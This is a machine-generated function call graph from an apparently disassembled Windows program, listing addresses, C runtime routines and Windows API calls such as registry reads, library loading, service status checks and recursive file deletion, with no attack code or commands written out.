d10d4a 20141->20142 20143 d10e34 __calloc_impl 20141->20143 20144 d0092b ___free_lconv_mon 69 API calls 20141->20144 20145 d10d58 20142->20145 20146 d0092b ___free_lconv_mon 69 API calls 20142->20146 20143->20120 20144->20142 20147 d10d66 20145->20147 20148 d0092b ___free_lconv_mon 69 API calls 20145->20148 20146->20145 20149 d10d74 20147->20149 20150 d0092b ___free_lconv_mon 69 API calls 20147->20150 20148->20147 20151 d10d82 20149->20151 20152 d0092b ___free_lconv_mon 69 API calls 20149->20152 20150->20149 20153 d10d90 20151->20153 20154 d0092b ___free_lconv_mon 69 API calls 20151->20154 20152->20151 20155 d10d9e 20153->20155 20156 d0092b ___free_lconv_mon 69 API calls 20153->20156 20154->20153 20157 d10daf 20155->20157 20158 d0092b ___free_lconv_mon 69 API calls 20155->20158 20156->20155 20159 d0efca __lock 69 API calls 20157->20159 20158->20157 20160 d10db7 20159->20160 20161 d10dc3 InterlockedDecrement 20160->20161 20162 d10ddc 20160->20162 20161->20162 20164 d10dce 20161->20164 20194 d10e40 20162->20194 20164->20162 20166 d0092b ___free_lconv_mon 69 API calls 20164->20166 20166->20162 20167 d0efca __lock 69 API calls 20168 d10df0 20167->20168 20175 d10e21 20168->20175 20197 d01b52 20168->20197 20172 d0092b ___free_lconv_mon 69 API calls 20172->20143 20241 d10e4c 20175->20241 20177 d0a5be __IsNonwritableInCurrentImage 20176->20177 20178 d10c93 __getptd_noexit 69 API calls 20177->20178 20180 d0a5d8 20178->20180 20179 d0a5e3 ExitThread 20180->20179 20183 d10e55 20180->20183 20184 d10e63 20183->20184 20185 d10eae 20183->20185 20188 d10e8c 20184->20188 20189 d10e69 TlsGetValue 20184->20189 20186 d0a5e2 20185->20186 20187 d10eb8 TlsSetValue 20185->20187 20186->20179 20187->20186 20190 d10a83 __decode_pointer 7 API calls 20188->20190 20189->20188 20191 d10e7c TlsGetValue 20189->20191 20192 d10ea3 20190->20192 20191->20188 20193 d10d26 __freefls@4 78 API calls 20192->20193 20193->20185 20244 d0eed8 LeaveCriticalSection 20194->20244 20196 d10de9 20196->20167 20198 d01b63 InterlockedDecrement 20197->20198 20199 d01be6 20197->20199 20200 d01b78 InterlockedDecrement 20198->20200 20201 d01b7b 20198->20201 20199->20175 20211 d0197a 20199->20211 20200->20201 20202 d01b85 InterlockedDecrement 20201->20202 20203 d01b88 20201->20203 20202->20203 20204 d01b92 InterlockedDecrement 20203->20204 20205 d01b95 20203->20205 20204->20205 20206 d01b9f InterlockedDecrement 20205->20206 20208 d01ba2 20205->20208 20206->20208 20207 d01bbb InterlockedDecrement 20207->20208 20208->20207 20209 d01bcb InterlockedDecrement 20208->20209 20210 d01bd6 InterlockedDecrement 20208->20210 20209->20208 20210->20199 20212 d01991 20211->20212 20213 d019fe 20211->20213 20212->20213 20216 d019c5 20212->20216 20226 d0092b ___free_lconv_mon 69 API calls 20212->20226 20214 d01a4b 20213->20214 20215 d0092b ___free_lconv_mon 69 API calls 20213->20215 20223 d01a72 20214->20223 20269 d11954 20214->20269 20218 d01a1f 20215->20218 20220 d019e6 20216->20220 20228 d0092b ___free_lconv_mon 69 API calls 20216->20228 20221 d0092b ___free_lconv_mon 69 API calls 20218->20221 20224 d0092b ___free_lconv_mon 69 API calls 20220->20224 20222 d01a32 20221->20222 20229 d0092b ___free_lconv_mon 69 API calls 20222->20229 20225 d01ab7 20223->20225 20235 d0092b 69 API calls ___free_lconv_mon 20223->20235 20230 d019f3 20224->20230 20231 d0092b ___free_lconv_mon 69 API calls 20225->20231 20232 d019ba 20226->20232 20227 d0092b ___free_lconv_mon 69 API calls 20227->20223 20233 d019db 20228->20233 20234 d01a40 20229->20234 20236 d0092b ___free_lconv_mon 69 API calls 20230->20236 20237 d01abd 20231->20237 20245 d11dd7 20232->20245 20261 d11b95 20233->20261 20240 d0092b ___free_lconv_mon 69 API calls 20234->20240 20235->20223 20236->20213 20237->20175 20240->20214 20357 d0eed8 LeaveCriticalSection 20241->20357 20243 d10e2e 20243->20172 20244->20196 20246 d11de4 20245->20246 20260 d11e61 20245->20260 20247 d11df5 20246->20247 20249 d0092b ___free_lconv_mon 69 API calls 20246->20249 20248 d11e07 20247->20248 20250 d0092b ___free_lconv_mon 69 API calls 20247->20250 20251 d11e19 20248->20251 20252 d0092b ___free_lconv_mon 69 API calls 20248->20252 20249->20247 20250->20248 20252->20251 20260->20216 20262 d11ba2 20261->20262 20263 d11bd6 20261->20263 20264 d11bb2 20262->20264 20266 d0092b ___free_lconv_mon 69 API calls 20262->20266 20263->20220 20265 d11bc4 20264->20265 20267 d0092b ___free_lconv_mon 69 API calls 20264->20267 20265->20263 20266->20264 20267->20265 20270 d11965 20269->20270 20271 d01a6b 20269->20271 20272 d0092b ___free_lconv_mon 69 API calls 20270->20272 20271->20227 20273 d1196d 20272->20273 20274 d0092b ___free_lconv_mon 69 API calls 20273->20274 20275 d11975 20274->20275 20357->20243 20358 c9ae8b 20369 d0155a 20358->20369 20360 c9aeaf GetModuleFileNameW 20370 c9acf3 20360->20370 20364 c9aee5 20365 c9820f ctype InterlockedDecrement 20364->20365 20366 c9aef1 20365->20366 20367 d0071a _strlwr_s_l_stat 5 API calls 20366->20367 20368 c9af0e 20367->20368 20369->20360 20403 c9780e LoadStringW 20370->20403 20373 c9ad2e 20374 c9accc std::_String_base::_Xlen 73 API calls 20373->20374 20375 c9ad40 20374->20375 20378 d0071a _strlwr_s_l_stat 5 API calls 20375->20378 20377 c9ad46 20379 c9ad73 20377->20379 20381 c9780e LoadStringW 20377->20381 20405 c99832 20377->20405 20380 c9ad98 20378->20380 20411 c9a9f2 20379->20411 20383 c99ad6 20380->20383 20381->20377 20384 c99ae2 __EH_prolog3_catch 20383->20384 20422 c97412 CLSIDFromProgID 20384->20422 20388 c99c5c 20433 c974ef CLSIDFromProgID 20388->20433 20391 c99c89 SysFreeString 20396 c99b19 std::_String_base::_Xlen 20391->20396 20392 c97f97 4 API calls 20397 c99cb7 20392->20397 20394 c99bf8 SysFreeString 20394->20396 20396->20364 20398 c97f97 4 API calls 20397->20398 20399 c99cee 20398->20399 20400 c99d11 20399->20400 20401 c99d24 SysFreeString 20399->20401 20400->20391 20401->20396 20404 c9782c 20403->20404 20404->20373 20404->20377 20407 c99846 std::_String_base::_Xlen 20405->20407 20406 c99881 20406->20377 20407->20406 20408 c9754f std::_String_base::_Xlen 71 API calls 20407->20408 20409 c99873 20408->20409 20410 c977da InterlockedDecrement 20409->20410 20410->20406 20416 c998fd 20411->20416 20414 c9aa0b 20414->20375 20415 c9aa03 lstrlenW 20415->20414 20417 c99909 20416->20417 20418 c99935 20416->20418 20419 c98399 std::_String_base::_Xlen InterlockedDecrement 20417->20419 20418->20414 20418->20415 20420 c9990e std::_String_base::_Xlen 20419->20420 20420->20418 20421 c9754f std::_String_base::_Xlen 71 API calls 20420->20421 20421->20418 20423 c9743b CoCreateInstance 20422->20423 20424 c9744f 20422->20424 20423->20424 20425 d0071a _strlwr_s_l_stat 5 API calls 20424->20425 20426 c9745b 20425->20426 20426->20396 20427 c97f97 20426->20427 20428 c97fa5 SysFreeString 20427->20428 20430 c97fc7 20427->20430 20429 c97fb0 SysAllocString 20428->20429 20428->20430 20429->20430 20431 c97fbd 20429->20431 20430->20388 20430->20394 20432 c8df10 std::_String_base::_Xlen 2 API calls 20431->20432 20432->20430 20434 c97518 CoCreateInstance 20433->20434 20435 c9752c 20433->20435 20434->20435 20436 d0071a _strlwr_s_l_stat 5 API calls 20435->20436 20437 c97538 20436->20437 20437->20391 20437->20392 20438 cf178b 20452 d0158d 20438->20452 20440 cf1797 GetDC 20453 cf15ee 20440->20453 20443 cf17c2 20445 cf17eb 20443->20445 20447 c9accc std::_String_base::_Xlen 73 API calls 20443->20447 20444 cf17b2 EnumFontFamiliesW 20444->20443 20446 cf17fe 20445->20446 20448 c9accc std::_String_base::_Xlen 73 API calls 20445->20448 20449 cf1811 ReleaseDC CreateFontW 20446->20449 20450 c9accc std::_String_base::_Xlen 73 API calls 20446->20450 20447->20445 20448->20446 20451 cf1841 std::_String_base::_Xlen 20449->20451 20450->20449 20452->20440 20454 d006a0 _memset 20453->20454 20455 cf1619 GetVersionExW 20454->20455 20456 d0071a _strlwr_s_l_stat 5 API calls 20455->20456 20457 cf1641 20456->20457 20457->20443 20457->20444 20458 ca2cef 20463 ca2ad2 20458->20463 20460 ca2d34 20461 ca2d03 std::_String_base::_Xlen 20461->20460 20462 d00729 __CxxThrowException@8 RaiseException 20461->20462 20462->20460 20464 ca2afc 20463->20464 20468 ca2af5 20463->20468 20469 c9e9e3 20464->20469 20466 d0071a _strlwr_s_l_stat 5 API calls 20467 ca2bcd 20466->20467 20467->20461 20468->20466 20470 c9e9f0 20469->20470 20471 d03dc0 _memmove_s __VEC_memcpy 20470->20471 20472 ca1256 20471->20472 20473 d03dc0 _memmove_s __VEC_memcpy 20472->20473 20474 ca126b 20473->20474 20474->20468 20475 ceca6b 20476 ceca8f _memset __EH_prolog3 20475->20476 20477 cecab2 SHGetValueW 20476->20477 20478 cecade 20477->20478 20487 cecb36 20477->20487 20478->20487 20507 c9b6e5 20478->20507 20479 d0071a _strlwr_s_l_stat 5 API calls 20481 ceccbc 20479->20481 20483 cecb2c 20485 c9820f ctype InterlockedDecrement 20483->20485 20484 cecb3d 20486 c9ccc5 73 API calls 20484->20486 20485->20487 20488 cecb4c 20486->20488 20487->20479 20489 c9ccc5 73 API calls 20488->20489 20490 cecb58 _memset 20489->20490 20491 cecb73 PathCombineW PathCombineW PathCombineW 20490->20491 20515 c8e2d0 20491->20515 20494 cecc44 _memset 20497 c8e2d0 149 API calls 20494->20497 20495 c8e2d0 149 API calls 20496 cecbcc 20495->20496 20496->20494 20498 c8e2d0 149 API calls 20496->20498 20501 cecc63 20497->20501 20499 cecbdf 20498->20499 20499->20494 20519 c8e730 20499->20519 20503 c9accc std::_String_base::_Xlen 73 API calls 20501->20503 20528 cec5b1 20501->20528 20503->20501 20504 cecbf1 20504->20494 20505 cecbf8 GetProcAddress GetProcAddress 20504->20505 20506 cecc1b 20505->20506 20506->20494 20506->20501 20508 c9b6f8 20507->20508 20513 c9b70b PathCombineW PathFileExistsW 20507->20513 20509 c9b70d lstrlenW 20508->20509 20510 c9b702 20508->20510 20512 c9b71b std::_String_base::_Xlen 20509->20512 20509->20513 20511 c9acf3 76 API calls 20510->20511 20511->20513 20512->20513 20514 c9754f std::_String_base::_Xlen 71 API calls 20512->20514 20513->20483 20513->20484 20514->20513 20516 c8e2e4 20515->20516 20517 c8e260 149 API calls 20516->20517 20518 c8e306 20517->20518 20518->20494 20518->20495 20520 c8e370 159 API calls 20519->20520 20521 c8e74d 20520->20521 20522 c8e76e LoadLibraryW 20521->20522 20523 c8e751 20521->20523 20522->20504 20524 c8e767 20523->20524 20525 c8e757 20523->20525 20524->20504 20539 c8e940 20525->20539 20531 cec5d4 _memset 20528->20531 20538 cec688 20528->20538 20529 d0071a _strlwr_s_l_stat 5 API calls 20530 cec69e 20529->20530 20530->20501 20532 cec603 GetFileVersionInfoSizeW 20531->20532 20531->20538 20533 cec617 20532->20533 20532->20538 20534 cec61e GetFileVersionInfoW 20533->20534 20533->20538 20535 cec632 VerQueryValueW 20534->20535 20534->20538 20536 cec655 _memset 20535->20536 20535->20538 20669 cc6919 20536->20669 20538->20529 20540 c8e950 _memset _wcsncat _wcsncpy 20539->20540 20541 c8ea0c GetActiveWindow MessageBoxW 20540->20541 20542 c8ea2b 20541->20542 20543 c8ea74 20541->20543 20553 d06060 20542->20553 20545 c8ea81 20543->20545 20577 d0363f 20543->20577 20548 d0071a _strlwr_s_l_stat 5 API calls 20545->20548 20549 c8e764 20548->20549 20549->20524 20550 c8ea4b ShellExecuteW 20550->20543 20554 d060f0 20553->20554 20555 d06071 20553->20555 20580 d05f76 20554->20580 20557 d05d61 _memcpy_s 69 API calls 20555->20557 20559 c8ea3f 20555->20559 20558 d06088 20557->20558 20560 d0653f _memcpy_s 7 API calls 20558->20560 20559->20550 20561 c8e830 20559->20561 20560->20559 20562 d006a0 _memset 20561->20562 20563 c8e85d SHGetValueW 20562->20563 20564 c8e898 20563->20564 20565 c8e8b4 PathCombineW PathFileExistsW 20563->20565 20566 d0071a _strlwr_s_l_stat 5 API calls 20564->20566 20565->20564 20567 c8e8d6 20565->20567 20568 c8e8ad 20566->20568 20569 c8e260 149 API calls 20567->20569 20568->20550 20570 c8e8f2 20569->20570 20570->20564 20571 c8e730 175 API calls 20570->20571 20572 c8e906 20571->20572 20572->20564 20573 c8e90c GetProcAddress 20572->20573 20574 c8e91a FreeLibrary 20573->20574 20575 d0071a _strlwr_s_l_stat 5 API calls 20574->20575 20576 c8e935 20575->20576 20576->20550 20646 d03513 20577->20646 20579 d03650 20579->20545 20581 d05f8e 20580->20581 20588 d05faa 20580->20588 20582 d05f95 20581->20582 20584 d05fbe 20581->20584 20583 d05d61 _memcpy_s 69 API calls 20582->20583 20585 d05f9a 20583->20585 20591 d00c48 20584->20591 20587 d0653f _memcpy_s 7 API calls 20585->20587 20587->20588 20588->20559 20589 d1105c 81 API calls __towlower_l 20590 d05fc9 20589->20590 20590->20588 20590->20589 20592 d00c5b 20591->20592 20598 d00ca8 20591->20598 20593 d10d0c __getptd 69 API calls 20592->20593 20594 d00c60 20593->20594 20595 d00c88 20594->20595 20599 d01c4f 20594->20599 20595->20598 20614 d104f3 20595->20614 20598->20590 20600 d01c5b __calloc_impl 20599->20600 20601 d10d0c __getptd 69 API calls 20600->20601 20602 d01c60 20601->20602 20603 d01c8e 20602->20603 20605 d01c72 20602->20605 20604 d0efca __lock 69 API calls 20603->20604 20606 d01c95 20604->20606 20607 d10d0c __getptd 69 API calls 20605->20607 20630 d01c11 20606->20630 20609 d01c77 20607->20609 20612 d01c85 __calloc_impl 20609->20612 20613 d03357 __amsg_exit 69 API calls 20609->20613 20612->20595 20613->20612 20615 d104ff __calloc_impl 20614->20615 20616 d10d0c __getptd 69 API calls 20615->20616 20617 d10504 20616->20617 20618 d0efca __lock 69 API calls 20617->20618 20619 d10516 20617->20619 20620 d10534 20618->20620 20622 d10524 __calloc_impl 20619->20622 20626 d03357 __amsg_exit 69 API calls 20619->20626 20621 d1057d 20620->20621 20623 d10565 InterlockedIncrement 20620->20623 20624 d1054b InterlockedDecrement 20620->20624 20642 d1058e 20621->20642 20622->20598 20623->20621 20624->20623 20627 d10556 20624->20627 20626->20622 20627->20623 20628 d0092b ___free_lconv_mon 69 API calls 20627->20628 20631 d01c15 20630->20631 20632 d01c47 20630->20632 20631->20632 20633 d01ac3 ___addlocaleref 8 API calls 20631->20633 20638 d01cb9 20632->20638 20645 d0eed8 LeaveCriticalSection 20642->20645 20647 d0351f __calloc_impl 20646->20647 20648 d0efca __lock 69 API calls 20647->20648 20649 d03526 20648->20649 20650 d035df __initterm 20649->20650 20652 d10a83 __decode_pointer 7 API calls 20649->20652 20663 d0362a 20650->20663 20654 d0355d 20652->20654 20654->20650 20657 d10a83 __decode_pointer 7 API calls 20654->20657 20655 d03627 __calloc_impl 20655->20579 20661 d03572 20657->20661 20658 d0361e 20659 d033ab __mtinitlocknum 3 API calls 20658->20659 20659->20655 20660 d10a7a 7 API calls ___crtMessageBoxW 20660->20661 20661->20650 20661->20660 20662 d10a83 7 API calls __decode_pointer 20661->20662 20662->20661 20664 d03630 20663->20664 20665 d0360b 20663->20665 20668 d0eed8 LeaveCriticalSection 20664->20668 20665->20655 20667 d0eed8 LeaveCriticalSection 20665->20667 20667->20658 20668->20665 20670 cc6924 20669->20670 20672 cc6951 20670->20672 20673 d03d9f 20670->20673 20672->20538 20676 d03ccb 20673->20676 20675 d03db7 20675->20672 20677 d03cfb 20676->20677 20678 d03cdb 20676->20678 20680 d03d27 20677->20680 20682 d03d0a 20677->20682 20679 d05d61 _memcpy_s 69 API calls 20678->20679 20681 d03ce0 20679->20681 20689 d14023 20680->20689 20683 d0653f _memcpy_s 7 API calls 20681->20683 20684 d05d61 _memcpy_s 69 API calls 20682->20684 20688 d03cf0 20683->20688 20686 d03d0f 20684->20686 20687 d0653f _memcpy_s 7 API calls 20686->20687 20687->20688 20688->20675 20690 d00c48 _LocaleUpdate::_LocaleUpdate 79 API calls 20689->20690 20691 d1408a 20690->20691 20692 d14092 20691->20692 20706 d140c9 __aulldvrm __woutput_l _strlen 20691->20706 20693 d05d61 _memcpy_s 69 API calls 20692->20693 20694 d14097 20693->20694 20695 d0653f _memcpy_s 7 API calls 20694->20695 20697 d140a7 20695->20697 20696 d0071a _strlwr_s_l_stat 5 API calls 20698 d14b96 20696->20698 20697->20696 20698->20688 20699 d13f54 69 API calls _write_string 20699->20706 20700 d0092b ___free_lconv_mon 69 API calls 20700->20706 20701 d13faa 69 API calls _write_string 20701->20706 20703 d14b59 20705 d05d61 _memcpy_s 69 API calls 20703->20705 20705->20694 20706->20697 20706->20699 20706->20700 20706->20701 20706->20703 20707 d10a83 7 API calls __decode_pointer 20706->20707 20708 d02f89 20706->20708 20711 d0c446 20706->20711 20707->20706 20709 d00c48 _LocaleUpdate::_LocaleUpdate 79 API calls 20708->20709 20710 d02f9c 20709->20710 20710->20706 20712 d0c44f 20711->20712 20713 d017ad _malloc 68 API calls 20712->20713 20714 d0c485 20712->20714 20715 d0c466 Sleep 20712->20715 20713->20712 20714->20706 20716 d0c47b 20715->20716 20716->20712 20716->20714 20717 cedb29 20718 cedb4d __EH_prolog3 20717->20718 20719 c9acf3 76 API calls 20718->20719 20720 cedb69 _memset 20719->20720 20721 cedd72 20720->20721 20723 cedb8d SHGetSpecialFolderPathW 20720->20723 20722 c9820f ctype InterlockedDecrement 20721->20722 20724 cedd7a 20722->20724 20725 cedd6a 20723->20725 20726 cedbb2 20723->20726 20727 d0071a _strlwr_s_l_stat 5 API calls 20724->20727 20728 c9820f ctype InterlockedDecrement 20725->20728 20729 c9b6e5 77 API calls 20726->20729 20730 cedd98 20727->20730 20728->20721 20731 cedbbf PathCombineW 20729->20731 20732 c9accc std::_String_base::_Xlen 73 API calls 20731->20732 20733 cedbdd PathFileExistsW 20732->20733 20734 cedc02 20733->20734 20735 cedbf0 PathIsDirectoryW 20733->20735 20737 cedc8d 20734->20737 20788 cec0cf 20734->20788 20735->20734 20736 cedbf9 DeleteFileW 20735->20736 20736->20734 20797 ced568 20737->20797 20741 cedc10 20741->20737 20742 cedc14 PathIsDirectoryW 20741->20742 20742->20737 20744 cedc1d PathIsDirectoryEmptyW 20742->20744 20743 c9b6e5 77 API calls 20745 cedca6 20743->20745 20744->20737 20746 cedc2a 20744->20746 20896 ca6fc8 20745->20896 20873 ce31fb 20746->20873 20749 cedcbc 20751 c998fd 72 API calls 20749->20751 20753 cedcc8 CharUpperW 20751->20753 20752 cedc37 GetTickCount 20889 c9d261 20752->20889 20755 c998fd 72 API calls 20753->20755 20757 cedcdb CharUpperW 20755->20757 20759 cedced 20757->20759 20762 cedd3d 20759->20762 20763 cedcf4 20759->20763 20760 cedc6c 20761 c9ccc5 73 API calls 20760->20761 20765 cedc79 20761->20765 20764 c9ccc5 73 API calls 20762->20764 20900 c9b7f5 20763->20900 20767 cedd46 20764->20767 20768 c9820f ctype InterlockedDecrement 20765->20768 20770 c9ccc5 73 API calls 20767->20770 20771 cedc81 20768->20771 20769 cedcff 20772 c9ccc5 73 API calls 20769->20772 20774 cedd3b 20770->20774 20775 c9820f ctype InterlockedDecrement 20771->20775 20773 cedd0c 20772->20773 20777 c9820f ctype InterlockedDecrement 20774->20777 20775->20737 20779 cedd5a 20777->20779 20780 c9820f ctype InterlockedDecrement 20779->20780 20782 cedd62 20780->20782 20906 ce7843 20788->20906 20791 cec0de 20791->20741 20792 cec0e0 OpenSCManagerW 20793 cec0fa OpenServiceW 20792->20793 20794 cec12b CloseServiceHandle CloseServiceHandle 20792->20794 20793->20794 20795 cec10e QueryServiceStatusEx 20793->20795 20794->20741 20795->20794 20796 cec124 20795->20796 20796->20794 20798 ced58c __EH_prolog3 20797->20798 20799 c9d261 98 API calls 20798->20799 20800 ced5b2 OutputDebugStringW 20799->20800 20801 c9820f ctype InterlockedDecrement 20800->20801 20802 ced5c7 20801->20802 20915 ce7974 20802->20915 20805 ced65c 20807 c9820f ctype InterlockedDecrement 20805->20807 20806 c9d261 98 API calls 20808 ced601 OutputDebugStringW 20806->20808 20809 ced664 20807->20809 20810 c9820f ctype InterlockedDecrement 20808->20810 20811 d0071a _strlwr_s_l_stat 5 API calls 20809->20811 20812 ced614 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20810->20812 20813 ced681 20811->20813 20814 cec0cf 15 API calls 20812->20814 20813->20743 20817 ced631 20814->20817 20815 ced657 20815->20805 20922 c9b6b2 20815->20922 20817->20815 20820 c9b6b2 std::_String_base::_Xlen 74 API calls 20817->20820 20822 ced652 20820->20822 20824 ced495 121 API calls 20822->20824 20824->20815 20874 ce3228 PathFileExistsW 20873->20874 20875 ce3221 20873->20875 20874->20875 20878 ce3233 _memset _wcslen 20874->20878 20876 d0071a _strlwr_s_l_stat 5 API calls 20875->20876 20877 ce33a7 20876->20877 20877->20737 20877->20752 20878->20875 20879 ce327a PathAppendW PathAppendW FindFirstFileW 20878->20879 20880 ce338e RemoveDirectoryW 20879->20880 20881 ce32b8 FindNextFileW 20879->20881 20880->20875 20882 ce3385 FindClose 20881->20882 20884 ce32cb _memset 20881->20884 20882->20880 20883 ce336f FindNextFileW 20883->20884 20887 ce3384 20883->20887 20884->20883 20885 ce3341 PathAppendW PathAppendW DeleteFileW 20884->20885 20886 ce3306 PathAppendW PathAppendW 20884->20886 20885->20883 20885->20884 20888 ce31fb 5 API calls 20886->20888 20887->20882 20888->20884 21494 c9cd15 20889->21494 20892 ca701f 20893 ca702b __EH_prolog3 20892->20893 20894 c982ad 71 API calls 20893->20894 20895 ca705d std::_String_base::_Xlen 20894->20895 20895->20760 20897 ca6fd4 __EH_prolog3 20896->20897 20898 c9988a 71 API calls 20897->20898 20899 ca7015 std::_String_base::_Xlen 20898->20899 20899->20749 20901 c9b801 __EH_prolog3 20900->20901 20902 c9b829 20901->20902 20903 c9b820 lstrlenW 20901->20903 20904 c982ad 71 API calls 20902->20904 20903->20902 20905 c9b83d std::_String_base::_Xlen 20904->20905 20905->20769 20907 ce786c _memset 20906->20907 20908 ce787d GetVersionExW 20907->20908 20909 ce78a4 GetModuleHandleW GetProcAddress 20908->20909 20910 ce7893 GetVersionExW 20908->20910 20911 ce78cc 20909->20911 20912 ce78bf GetNativeSystemInfo 20909->20912 20910->20909 20910->20911 20913 d0071a _strlwr_s_l_stat 5 API calls 20911->20913 20912->20911 20914 ce78e8 20913->20914 20914->20791 20914->20792 20917 ce79a8 _memset 20915->20917 20921 ce79fe 20915->20921 20916 d0071a _strlwr_s_l_stat 5 API calls 20918 ce7a22 20916->20918 20992 d0a9eb 20917->20992 20918->20805 20918->20806 20921->20916 20923 c9b6cf 20922->20923 20924 c9b6c1 InterlockedIncrement 20922->20924 20926 c9accc std::_String_base::_Xlen 73 API calls 20923->20926 20925 c9b6df 20924->20925 20927 ced495 20925->20927 20926->20925 20928 ced4a1 __EH_prolog3 20927->20928 20929 c9b6b2 std::_String_base::_Xlen 74 API calls 20928->20929 20930 ced4bc 20929->20930 21026 ced331 20930->21026 20995 d0a7d0 20992->20995 20996 d0a86a 20995->20996 21002 d0a7e9 20995->21002 20997 d0a9b6 20996->20997 20998 d0a99b 20996->20998 20999 d05d61 _memcpy_s 69 API calls 20997->20999 21000 d05d61 _memcpy_s 69 API calls 20998->21000 21001 d0a9a0 20999->21001 21000->21001 21003 d0653f _memcpy_s 7 API calls 21001->21003 21009 ce79c9 GetDiskFreeSpaceExW 21001->21009 21002->20996 21006 d0a858 21002->21006 21017 d01877 21002->21017 21003->21009 21005 d0a93e 21005->20996 21005->21009 21010 d0a9c9 21005->21010 21006->20996 21014 d0a8d6 21006->21014 21016 d01877 __wsplitpath_helper 69 API calls 21006->21016 21007 d0a911 21007->20996 21007->21009 21013 d0a92a 21007->21013 21008 d0a8f4 21008->20996 21008->21007 21012 d01877 __wsplitpath_helper 69 API calls 21008->21012 21009->20921 21011 d01877 __wsplitpath_helper 69 API calls 21010->21011 21011->21009 21012->21007 21015 d01877 __wsplitpath_helper 69 API calls 21013->21015 21014->21005 21014->21008 21015->21009 21016->21014 21018 d01889 21017->21018 21020 d01892 21018->21020 21021 d0188d 21018->21021 21023 d018d9 21018->21023 21019 d05d61 _memcpy_s 69 API calls 21025 d018a9 21019->21025 21020->21006 21021->21019 21021->21020 21022 d0653f _memcpy_s 7 API calls 21022->21020 21023->21020 21024 d05d61 _memcpy_s 69 API calls 21023->21024 21024->21025 21025->21022 21027 ced355 __EH_prolog3 21026->21027 21055 caef42 21027->21055 21056 caef4e __EH_prolog3 21055->21056 21097 caeb43 21056->21097 21103 cae867 21097->21103 21106 cae597 21103->21106 21109 caacc0 21106->21109 21112 c8d210 21109->21112 21113 c8d21b 21112->21113 21114 c8d231 21112->21114 21130 d0167f 21113->21130 21114->21113 21115 c8d23d 21114->21115 21142 d06117 21115->21142 21133 d01689 21130->21133 21495 c9d005 21494->21495 21510 c9cd3b _wcslen 21494->21510 21496 c99832 72 API calls 21495->21496 21499 c9d011 21496->21499 21497 c9cfeb CharNextW 21500 c9cff6 CharNextW 21497->21500 21498 c9cd4c CharNextW 21498->21497 21498->21510 21501 c9d036 21499->21501 21516 d02ded 21499->21516 21500->21495 21500->21510 21501->20892 21504 c9cd9f CharNextW 21504->21510 21505 c9a9f2 73 API calls 21505->21501 21506 c9cde6 CharNextW 21507 c9cdf2 CharNextW 21506->21507 21506->21510 21507->21510 21508 c9cdce CharNextW 21508->21510 21509 c9ce7e CharNextW 21509->21510 21510->21497 21510->21498 21510->21500 21510->21504 21510->21506 21510->21508 21510->21509 21511 c9cf73 lstrlenA 21510->21511 21512 d0306f 80 API calls 21510->21512 21513 c9ce1b CharNextW 21510->21513 21514 c9cf26 lstrlenW 21510->21514 21515 c9cf02 OutputDebugStringW DebugBreak 21510->21515 21511->21510 21512->21510 21513->21510 21514->21510 21515->21510 21519 d02d62 21516->21519 21520 d02d8c 21519->21520 21521 d02d6f 21519->21521 21522 d02d99 21520->21522 21529 d02da6 21520->21529 21523 d05d61 _memcpy_s 69 API calls 21521->21523 21524 d05d61 _memcpy_s 69 API calls 21522->21524 21525 d02d74 21523->21525 21527 d02d9e 21524->21527 21526 d0653f _memcpy_s 7 API calls 21525->21526 21530 c9d02a 21526->21530 21528 d0653f _memcpy_s 7 API calls 21527->21528 21528->21530 21529->21530 21531 d05d61 _memcpy_s 69 API calls 21529->21531 21530->21505 21531->21527 21532 c8e260 21533 c8e190 149 API calls 21532->21533 21534 c8e28e 21533->21534 21535 c9afa1 21536 c9afc5 __EH_prolog3 21535->21536 21557 c9a935 EnterCriticalSection GetCurrentThreadId 21536->21557 21641 c99a0d 21557->21641 21559 c9a96b LeaveCriticalSection 21646 c98492 21559->21646 21562 cb8cc0 21563 cb8ccc __EH_prolog3 21562->21563 21719 cc61f6 21563->21719 21565 cb8cff 21725 cb8c2b 21565->21725 21567 cb8d48 21729 cb6066 21567->21729 21569 cb8d57 21735 cb60b7 21569->21735 21571 cb8d66 21741 cb6108 21571->21741 21649 d00f22 21641->21649 21644 d00f22 __recalloc 75 API calls 21645 c99a25 21644->21645 21645->21559 21647 c9849b LeaveCriticalSection 21646->21647 21648 c984a7 21646->21648 21647->21648 21648->21562 21650 d00f31 21649->21650 21651 d00f59 21649->21651 21650->21651 21654 d00f3d 21650->21654 21652 d00f6e 21651->21652 21653 d00f66 21651->21653 21675 d0d896 21652->21675 21662 d11124 21653->21662 21657 d05d61 _memcpy_s 69 API calls 21654->21657 21658 d00f42 21657->21658 21659 d0653f _memcpy_s 7 API calls 21658->21659 21660 c99a1e 21659->21660 21660->21644 21660->21645 21661 d00f7a _memset 21661->21660 21663 d11130 __calloc_impl 21662->21663 21664 d11140 21663->21664 21665 d1115d 21663->21665 21666 d05d61 _memcpy_s 69 API calls 21664->21666 21667 d1119e HeapSize 21665->21667 21669 d0efca __lock 69 API calls 21665->21669 21668 d11145 21666->21668 21671 d11155 __calloc_impl 21667->21671 21670 d0653f _memcpy_s 7 API calls 21668->21670 21672 d1116d ___sbh_find_block 21669->21672 21670->21671 21671->21652 21711 d111be 21672->21711 21676 d0d8a2 __calloc_impl 21675->21676 21677 d0d8b7 21676->21677 21678 d0d8a9 21676->21678 21680 d0d8ca 21677->21680 21681 d0d8be 21677->21681 21679 d017ad _malloc 69 API calls 21678->21679 21696 d0d8b1 _realloc __calloc_impl 21679->21696 21688 d0da3c 21680->21688 21708 d0d8d7 _memcpy_s ___sbh_resize_block ___sbh_find_block 21680->21708 21682 d0092b ___free_lconv_mon 69 API calls 21681->21682 21682->21696 21683 d0da6f 21685 d11307 __calloc_impl 7 API calls 21683->21685 21684 d0efca __lock 69 API calls 21684->21708 21687 d0da75 21685->21687 21686 d0da41 HeapReAlloc 21686->21688 21686->21696 21689 d05d61 _memcpy_s 69 API calls 21687->21689 21688->21683 21688->21686 21690 d0da93 21688->21690 21691 d11307 __calloc_impl 7 API calls 21688->21691 21694 d0da89 21688->21694 21689->21696 21692 d05d61 _memcpy_s 69 API calls 21690->21692 21690->21696 21691->21688 21693 d0da9c GetLastError 21692->21693 21693->21696 21697 d05d61 _memcpy_s 69 API calls 21694->21697 21696->21661 21699 d0da0a 21697->21699 21698 d0d962 HeapAlloc 21698->21708 21699->21696 21701 d0da0f GetLastError 21699->21701 21700 d0d9b7 HeapReAlloc 21700->21708 21701->21696 21702 d0fd38 ___sbh_alloc_block 5 API calls 21702->21708 21703 d0da22 21703->21696 21705 d05d61 